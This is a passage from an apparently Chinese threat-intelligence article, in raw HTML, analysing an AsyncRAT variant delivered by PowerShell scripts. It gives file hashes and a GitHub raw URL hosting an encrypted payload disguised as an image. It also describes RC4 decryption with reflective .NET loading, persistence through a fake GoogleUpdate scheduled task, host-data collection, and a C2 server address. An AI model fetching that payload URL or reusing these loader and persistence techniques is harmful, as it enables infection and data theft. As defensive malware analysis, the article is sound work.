face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">执行</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Eudksre.ps1</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”文件。</span></font></font></font></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.147239263803681" data-s="300,640" data-type="png" data-w="978" type="block" data-imgfileid="100024876" src="https://wechat2rss.xlab.app/img-proxy/?k=b3866a0d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKnPcB23eahicfZjCcPrxWWVNDM9cs94icWrkngYiazMrELZiaQ6B232krGmictk89QygvLwAtqHywvPtxRrqeOcCM0OJv44hLYGiads%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;" data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“Eudksre.ps1”</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">文件信息如下：</span></font></p><div style="text-indent: 0px;"><div><div><div><div><div><p><table><tbody><tr></tr></tbody></table></p></div></div></div><div><div><div><p><table style="width: 575px;"><tbody><tr><td data-colwidth="108"><p><span style="border-color: rgb(0, 0, 0);font-size: 16px;"><span leaf="">MD5</span></span></p></td><td data-colwidth="467"><p><span style="font-size: 16px;"><span leaf="" data-pm-slice="0 0 []">8</span><span leaf="">49ddfdba81</span><span leaf="">0b251522690d51475a359</span></span></p></td></tr><tr><td data-colwidth="108"><p><span style="border-color: rgb(0, 0, 0);font-size: 16px;"><span leaf="">文件大小</span></span></p></td><td data-colwidth="467"><p><span style="font-size: 16px;"><span leaf="">3.12 KB (3,199 字节)</span></span></p></td></tr><tr><td data-colwidth="108"><p><span style="border-color: rgb(0, 0, 0);font-size: 16px;"><span leaf="">文件名</span></span></p></td><td data-colwidth="467"><p data-mpa-action-id="mp3ozqw91zn7"><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);"><span leaf="">Eudksre.ps1</span></span></span></p></td></tr></tbody></table></p></div></div></div><p style="margin-top: 16px;margin-bottom: 16px;text-indent: 2em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“Eudksre.ps1”的主要功能是读取“<a href="https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/fox.png”内容，然后使用修改过的RC4解密算法解密“fox.png”文件内容，然后通过.Net反射加载的方式执行解密之后的.Net载荷。" target="_blank">https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/fox.png”内容，然后使用修改过的RC4解密算法解密“fox.png”文件内容，然后通过.Net反射加载的方式执行解密之后的.Net载荷。</a></span></p></div></div></div><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4452466907340554" data-s="300,640" data-type="png" data-w="831" type="block" data-imgfileid="100024877" src="https://wechat2rss.xlab.app/img-proxy/?k=78be4e98&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIsYqjRW2xR01rFx4wv7b6q6ddNXLefDYSice4CaSibEjavKlgs84ic0Z9DaIicRJwfnW1CibRFVES6UMU8evuteI8mj5TK4SnrNlhU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Eudksref.ps1</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">信息如下：</span></font></p><div><div><div><div><p><table style="width:575px;"><tbody><tr><td data-colwidth="108"><p><span style="border-color: rgb(0, 0, 0);font-size: 16px;"><span leaf="">MD5</span></span></p></td><td data-colwidth="467"><p><span leaf="">45b6b7dadc13e4a4cc30dd82eb58c3ed</span></p></td></tr><tr><td data-colwidth="108"><p><span style="border-color: rgb(0, 0, 0);font-size: 16px;"><span leaf="">文件大小</span></span></p></td><td data-colwidth="467"><p><span style="font-size: 16px;"><span leaf="">1.63 KB (1,677 字节)</span></span></p></td></tr><tr><td data-colwidth="108"><p><span style="border-color: rgb(0, 0, 0);font-size: 16px;"><span leaf="">文件名</span></span></p></td><td data-colwidth="467"><p data-mpa-action-id="mp3ozqw91zn7"><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);"><span leaf="">Eudksref.ps1</span></span></span></p></td></tr></tbody></table></p></div></div><p style="margin-bottom: 16px;text-indent: 2em;"><span leaf="">“</span><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Eudksref.ps1</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”是一个</span><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">PowerShell</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">脚本，该脚本首先创建一个名为“</span><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">GoogleUpdateTaskMachineUA{1C791230-CA8D-6D04-AC55-F706378A30E}</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”计划任务，用于持久化执行“</span><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">taskschd.vbs</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”，然后会收集机器相关信息，包括系统信息，用户本地应用数据目录，进程列表，并将这些数据编码之后发送到</span><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Github</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">平台进行保存。</span></p></div></div><p style="text-align: center;margin-bottom: 16px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2431466030989273" data-s="300,640" data-type="png" data-w="839" type="block" data-imgfileid="100024890" src="https://wechat2rss.xlab.app/img-proxy/?k=6fa99836&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIfK8ibff7NxHWHoib2kSpQkUibHvjbt7Eb3N3mLkLHBPVyUl7QFrxIIcKqiacxSJiaPn4aM435aUGzJcpfPDeuichWDIerH3jMibWicic0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h3 style="text-indent: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">3.2. </span></span><b><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">P</span></span></font></b><b><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">E </span></span></b><b><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">组件</span></span></font></b></h3><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“Eudksre.ps1”</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">通过反射加载的方式执行一个</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">.Net组件，该文件不落地，原始文件名为“</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">rTom.exe</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”，经分析发现该文件为</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">AsyncRAT变种木马</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">。</span></font></p><div><div><p><table style="width:571px;"><tbody><tr><td data-colwidth="120"><p><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">MD5</span></span></span></p></td><td data-colwidth="451"><p><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">0d8ceb7dea7d471afa2f8e753b13d2d6</span></span></span></p></td></tr><tr><td data-colwidth="120"><p><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">文件大小</span></span></span></p></td><td data-colwidth="451"><p><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">2.24 MB (2,355,200 字节)</span></span></span></p></td></tr><tr><td data-colwidth="120"><p><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">文件名</span></span></span></p></td><td data-colwidth="451"><p><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">rTom.exe</span></span></span></p></td></tr><tr><td data-colwidth="120"><p data-mpa-action-id="mp3p90l727e"><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Timestamp</span></span></span></p></td><td data-colwidth="451"><p data-mpa-action-id="mp3p94o921k6"><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">2026-03-17 08:21:28</span></span></span></p></td></tr></tbody></table></p></div></div><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">当</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">程序</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">运行之后首先通过互斥避免多开。</span></font></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.44527363184079605" data-s="300,640" data-type="png" data-w="804" type="block" data-imgfileid="100024880" src="https://wechat2rss.xlab.app/img-proxy/?k=e4d685da&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKgVNicy6O4vWFibk6hwV3oZiaZia6ibaYdQScibCibNnO404ngcRPgXPDEPMgYeKUicJx7fIo28tTZq9rjicQtIvkcHW0iayWbyt19qq7fM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">在完成必要的</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">socket初始化之后，连接C</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">服务器（</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">1</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">12.216.9.171</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">:</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">3385</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">）</span></font></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.4186046511627907" data-s="300,640" data-type="png" data-w="817" type="block" data-imgfileid="100024881" src="https://wechat2rss.xlab.app/img-proxy/?k=3128775c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLUZcJN0LHgrqzibLOHqFECqhkIfzF5jwvicI1DamxxEQtolFmjujlFDkdMuAP7RyDOM9yb3QSxpTP8eSByvEEFJorZ24iaT1be7U%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">随后恶意程序会采集受害主机的用户名、操作系统信息、木马程序自身版本、当前运行权限是否为管理员、前台活动窗口标题等多类设备与运行状态信息，完成信息汇总后主动回传至服务端。</span></font></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2644230769230769" data-s="300,640" data-type="png" data-w="832" type="block" data-imgfileid="100024933" src="https://wechat2rss.xlab.app/img-proxy/?k=8e1c5133&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJhIo1GbYC8NDJOePDTsYjJ0mWWIv2lMUxlN3PbkCORV66VZaxh77jAWanib44rOCx8YcQHDLSb94nT3n1WpJ6uKaA5F8IHEhiaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">然后恶意程序在接收到服务端返回的数据后，会调用回调函数</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, 